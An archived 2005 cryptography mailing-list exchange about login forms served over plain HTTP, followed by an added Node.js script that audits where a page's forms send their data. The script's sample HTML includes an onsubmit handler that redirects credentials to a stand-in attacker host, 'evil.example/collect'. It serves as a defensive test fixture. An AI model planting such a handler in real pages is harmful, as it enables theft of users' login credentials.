X-Original-To: cryptography@metzdowd.com
Date: Wed, 08 Jun 2005 15:40:22 +0100
From: Ben Laurie <ben@algroup.co.uk>
To: "Perry E. Metzger" <perry@piermont.com>
Cc: cryptography@metzdowd.com
In-Reply-To: <87zmu1j6b1.fsf@snark.piermont.com>

Perry E. Metzger wrote:
> Ben Laurie <ben@algroup.co.uk> writes:
>
>>Perry E. Metzger wrote:
>>
>>>Have a look, for example, at http://www.americanexpress.com/
>>>which encourages users to type in their credentials, in the clear,
>>>into a form that came from lord knows where and sends the information
>>>lord knows where. Spoof the site, and who would notice?
>>>Every company should be telling its users never to type in their
>>>credentials on a web page downloaded in the clear, but American
>>>Express and lots of other companies train their users to get raped,
>>>and why do they do it? Not because they made some high level decision
>>>to screw their users. Not because they can't afford to do things
>>>right. It happens because some idiot web designer thought it was a
>>>nice look, and their security people are too ignorant or too powerless
>>>to stop it, that's why.
>>
>>Why is it bad for the page to be downloaded clear? What matters is the
>>destination is encrypted, surely?
>
>
> Why is it a problem? Because the http post method you're relying on
> could have come from anyone -- you're just assuming that it posts to
> Amex's site.
>
> How often do users hit ^U and read the source on the front page of a
> site like this? Never, for practical purposes. Unless you're looking
> at the code every time, you have no idea where your form data gets
> posted. It could be a server in Moldova instead of Manhattan.

Fair point. Of course, I knew because I did hit ^U - and followed through
to the page containing the javascript it ran!

--
http://www.apache-ssl.org/ben.html
http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit."
 - Robert Woodruff

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
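The point Perry makes above is that the page carrying the login form, not just the form's destination, decides where the credentials go: a page fetched over plain HTTP can be rewritten in transit, so its action URL and any submit handler are whatever the attacker chose. The following is an added example, not code from the thread or from any site discussed in it, that mechanises the "hit ^U" check: it pulls every <form> out of a page and reports a form served over HTTP, a non-HTTPS action, an action host outside an allow-list, a GET method, or an onsubmit handler that could rewrite the action. The sample HTML and the hostnames (login.example.com, login.example.md, evil.example) are constructed for the example.

```javascript
// Added example, not part of the original mailing-list thread.
// Audits where a page's forms will actually send their fields, which is
// what reading the page source by hand tells you. Runs under Node.js with
// no dependencies; the HTML below is constructed sample input.

// Minimal <form ...> scanner: enough for quoted and bare attribute values.
// A real audit would use a DOM, but the logic of the check is the same.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = {};
    const attrRe = /([a-zA-Z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[3] ?? a[4] ?? a[5];
    }
    forms.push(attrs);
  }
  return forms;
}

// pageUrl: the URL the HTML was fetched from (an empty or relative action
// resolves against it). trustedHosts: where credentials are allowed to go.
function auditForms(pageUrl, html, trustedHosts) {
  const page = new URL(pageUrl);
  const findings = [];
  for (const f of extractForms(html)) {
    const problems = [];
    const target = new URL(f.action ?? "", page);
    if (page.protocol !== "https:") {
      problems.push("form delivered over " + page.protocol.slice(0, -1) + ", so it may have been altered in transit");
    }
    if (target.protocol !== "https:") {
      problems.push("action is not https: " + target.href);
    }
    if (!trustedHosts.includes(target.hostname)) {
      problems.push("action host not in allow-list: " + target.hostname);
    }
    if ((f.method ?? "get").toLowerCase() !== "post") {
      problems.push("method " + (f.method ?? "GET").toUpperCase() + " puts fields into the URL");
    }
    if (f.onsubmit) {
      problems.push("onsubmit handler can change the action at submit time: " + f.onsubmit);
    }
    findings.push({ action: target.href, problems });
  }
  return findings;
}

// Constructed sample: a front page fetched over plain HTTP with three
// forms. The first posts to the right host; the second to a look-alike
// host; the third has a relative action plus a script that redirects it.
const SAMPLE_PAGE_URL = "http://www.example.com/";
const SAMPLE_HTML = `
<form method="post" action="https://login.example.com/session"></form>
<form method="post" action="https://login.example.md/session"></form>
<form method="post" action="/login" onsubmit="this.action='http://evil.example/collect';"></form>
`;
const SAMPLE_TRUSTED = ["login.example.com", "www.example.com"];

function auditSample() {
  return auditForms(SAMPLE_PAGE_URL, SAMPLE_HTML, SAMPLE_TRUSTED);
}

for (const f of auditSample()) {
  console.log(f.action);
  for (const p of f.problems) console.log("  - " + p);
}
```

Even the first form, which posts to the correct HTTPS host, is flagged: because the page itself arrived over HTTP, nothing guarantees the user saw that form rather than a rewritten one, which is the objection to serving the login page in the clear in the first place.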